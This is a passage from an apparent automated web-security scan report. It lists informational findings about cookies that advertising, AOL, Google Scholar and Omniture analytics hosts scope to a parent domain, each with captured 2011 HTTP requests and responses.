BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
ROLL=boAns2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIeB!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDU1NzExMTsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=3YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGaQsjUAbUa4YNS/B73chOvIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; F1=Bcj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAUAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DNolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAnt2C+PRAglcGLPJnzdbH8d75VK2BUk5QpnoE!

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:58:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894873.800563.0XMC
Set-Cookie: C2=7YfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIA0rGAHC25lBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIoN5FAHCFBqBwhQTaaAcIE0rGAHCGenBwhwoyaAc1qaBaMrR3U7qFEysGMWkBUAoNX8imZOiGgasjUAbUa4YNSPC73cBwtIuFUAsFRpZrgqxbCrnF8ekGKal0Xw6iaElTCVB0kdhiyq7FEwcGKKtyVw2saoopeQBP7lhiCKYG8KIGfysVbAJqakdj+uBXTjRuGJwHsb0Fbpr5fAhTaExzC1BLRqRPjq/HEqXGW9nDfAIcYQ/1+PCVSrxaZW60askhaBCdPiBwFKvIcuKGAHmOgALjYAcIw5oGAHCxbfBwB; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: F1=Bsj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAYAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: ROLL=boAns2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIeB!; domain=advertising.com; expires=Sat, 04-May-2013 00:58:34 GMT; path=/
Set-Cookie: 84248618=_4dc1f63b,0642027268,800563^894873^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:58:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 676

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735206/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bsj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAYAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAns2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIeB!; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956559.804145.93313567XMC
Set-Cookie: F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
Set-Cookie: ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIexFgigakxI!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:42 GMT; path=/
Set-Cookie: 31568465=_4dc1f67d,1346633562,804145^956559^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:59:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 669

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIextYFhakxI!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=Bsj9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAYAA+CA; BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2u/Wu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; ROLL=boAns2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIeB!; C2=cZfwN5pqEIxFGJpovUg3sY0NSKMCItdBwhQ3WXAcIsY4FAHCw3gBwhgu4YAcIoY4FAHCbGeBwhw7NYAcI0NYGAHCjGeBwhAhhXAcIgJaGAHCcbpBwhAQvaAcIYnXGAHC+XhBwhw2kXAcIsijGAHCaTeBwhwtZaAcIE0rGAHCFBqBwhQTaaAcI0soGAHCGenBwVrqFoxsGdTtrWQIzawYRGQBg2cxLam5IaAqxOSBsRphj1I9IsfzFA3i4WQBwWElmtCqGvJseWw7RaooVSfBrLqRUOJUFQT2FKKruXQAzZoo0KXBbzqhim6BF8sXGKKogZwrgY8JzWtBkoqR2N67GcNNG5akAfwuRXslum/BEOpREPLUHsEpG9Mq+fQoeZY1fO8BgwhB9X7/IUJtGrlZpTrxSGqFI09IGAXo8iw5qYAcY6ACsMiBwhAnjaAcIEv9FAH; GUID=MTMwNDU1NzE0ODsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 00:59:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.894875.804145.93312584XMC
Set-Cookie: F1=B0n9B3kAAAAAmc1CAEAAgEgAAAAA6c1CAEAAgEABAAAABAAAAcAA+CA; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
Set-Cookie: BASE=RgwqzyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpMSJWcFkgo700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3GAQ4I!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
Set-Cookie: ROLL=boAnv2C+PRAglcGLPJnzdbH8d75VK2BUk5Qpno0+3KawIextYFhakxI!; domain=advertising.com; expires=Sat, 04-May-2013 00:59:41 GMT; path=/
Set-Cookie: 24626462=_4dc1f67d,5365043223,804145^894875^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 00:59:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 669

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253735207/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894
...[SNIP]...

16.100. http://realestate.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realestate.aol.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RSP_COOKIE=aid=d2c1780676b211e0b997d2532fe826c9; path=/; domain=.aol.com; expires=Fri May 04 00:58:43 2012 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?icid=navbar_realest_main5 HTTP/1.1
Host: realestate.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575091494-Repeat%7C1367647091494%3B%20s_nrgvo%3DRepeat%7C1367647091495%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:43 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_COOKIE=aid=d2c1780676b211e0b997d2532fe826c9; path=/; domain=.aol.com; expires=Fri May 04 00:58:43 2012 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: userNum=98; Expires=Sat, 04-Jun-2011 00:58:43 GMT
Content-Length: 51590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...

16.101. http://scholar.google.com/schhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scholar.google.com
Path:	/schhp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=4daec4b7993eb97d:TM=1304592839:LM=1304592839:S=EvjNjDbhiidMVIdd; expires=Sat, 04-May-2013 10:53:59 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /schhp HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=4daec4b7993eb97d; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=4daec4b7993eb97d:TM=1304592839:LM=1304592839:S=EvjNjDbhiidMVIdd; expires=Sat, 04-May-2013 10:53:59 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 05 May 2011 10:53:59 GMT
Server: scholar
Expires: Thu, 05 May 2011 10:53:59 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><link rel="canonical" href="/"><title>Google Scholar</title><style>body,td,a,
...[SNIP]...

16.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s32555036570411

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s32555036570411 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www64
Content-Length: 0
Content-Type: text/plain
Connection: close

16.103. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s34991793073713

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s34991793073713 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www356
Content-Length: 0
Content-Type: text/plain
Connection: close

16.104. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s41508008833043

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s41508008833043 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
